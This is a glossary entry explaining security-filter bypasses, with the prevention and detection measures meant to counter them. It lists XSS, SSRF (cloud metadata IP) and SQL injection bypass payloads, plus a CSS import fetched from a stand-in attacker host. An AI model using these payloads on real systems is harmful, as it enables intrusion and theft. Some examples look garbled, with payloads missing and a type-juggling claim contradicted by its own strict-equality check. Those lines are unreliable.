Bypass

Short Definition

Bypass means finding a clever way around security measures. If there's a filter blocking "attack.com", you might try "att%61ck.com" (URL encoded) or "attack.com." (with a dot). The security is there, but you found a loophole.

Full Definition

A bypass is a technique that circumvents security controls without directly breaking them. You're not destroying the lock — you're finding another door.

Common bypass targets:

• WAF (Web Application Firewall)
• Input validation/filters
• Authentication mechanisms
• Rate limiting
• IP restrictions
• File upload restrictions
• Access controls

Bypass categories:

Encoding/Obfuscation:

• URL encoding: <script> → %3Cscript%3E
• Double encoding: < → %253C
• Unicode: < → \u003C
• Case variation: <ScRiPt>

Logic flaws:

• Race conditions
• Parameter pollution
• Type juggling
• Path normalization

Protocol abuse:

• HTTP smuggling
• DNS rebinding
• SSRF redirects

Why It Matters

• Security measures are only effective if they can't be bypassed
• Bypass techniques are constantly evolving
• One successful bypass can negate entire security infrastructure
• Bypasses are often simpler than direct attacks

How Attackers Use It

WAF Bypass example:

WAF blocks: <script>alert(1)</script>

Bypasses:

1alert(1)     ← Blocked
2<script>alert(1)  ← May work
3  ← Alternative
4<svg/onload=alert(1)>         ← SVG vector

SSRF Filter Bypass:

Blocked: http://169.254.169.254

Bypasses:

1http://169.254.169.254          ← Blocked
2http://169.254.169.254.nip.io   ← DNS bypass
3http://0xA9FEA9FE               ← Hex IP
4http://[::ffff:169.254.169.254] ← IPv6
5http://169.254.169.254.        ← Trailing dot
6http://①⑥⑨.②⑤④.①⑥⑨.②⑤④  ← Unicode digits

Authentication Bypass:

1// Vulnerable check
2if (password === "admin123") {
3  login();
4}
5
6// Bypass with type juggling
7password = true;  // true == "admin123" may be true

How to Detect or Prevent It

Prevention:

• Whitelist > Blacklist
• Defense in depth (multiple layers)
• Proper input canonicalization
• Strict type checking
• Regular expression carefully crafted
• Test with bypass payloads

Specific defenses:

SSRF Prevention:

1# Bad: Blacklist
2if "169.254.169.254" not in url:
3    fetch(url)  # Can be bypassed
4
5# Good: Whitelist + DNS resolution check
6allowed_domains = ["example.com"]
7parsed = urlparse(url)
8if parsed.hostname in allowed_domains:
9    ip = socket.gethostbyname(parsed.hostname)
10    if not is_private_ip(ip):
11        fetch(url)

Detection:

• Log all filtered requests
• Monitor for bypass patterns:
  • Excessive encoding
  • Unusual characters
  • Multiple failed attempts
  • Success after many failures
• Use advanced WAFs with ML
• Regular security testing

Common Misconceptions

• "WAF means I'm safe" - WAFs are regularly bypassed
• "Input validation is enough" - Need output encoding too
• "Blacklists work fine" - Impossible to enumerate all bad inputs
• "Bypasses are theoretical" - Widely used in real attacks
• "Complex filters are better" - Often introduce new bypasses

Real-World Example

CloudFlare WAF Bypass (2019)

Protected site blocked <script>, but allowed:

1@import'http://attacker.com/xss.css';

Result: XSS execution despite WAF.

URL Parser Bypass (Many Applications)

Different parsers disagree on URL interpretation:

1http://evil.com@internal.com
2
3Parser A: "Going to internal.com"
4Parser B: "Going to evil.com"

If validator uses Parser A and request uses Parser B → bypass.

Capital One SSRF Bypass

WAF had rules, but misconfigured:

• Allowed certain HTTP methods
• Didn't check all headers
• Validation happened after routing

Attacker found the gap → full SSRF.

OWASP Top 10 2021 Bypass Examples:

A01 (Access Control):

• Change user_id=123 to user_id=124 in POST body
• Add admin=true parameter

A03 (Injection):

• WAF blocks ' OR 1=1--
• Try ' OR 'a'='a or ' OR 2>1--

Related Terms

WAF, Filter, Firewall, Exploit, Encoding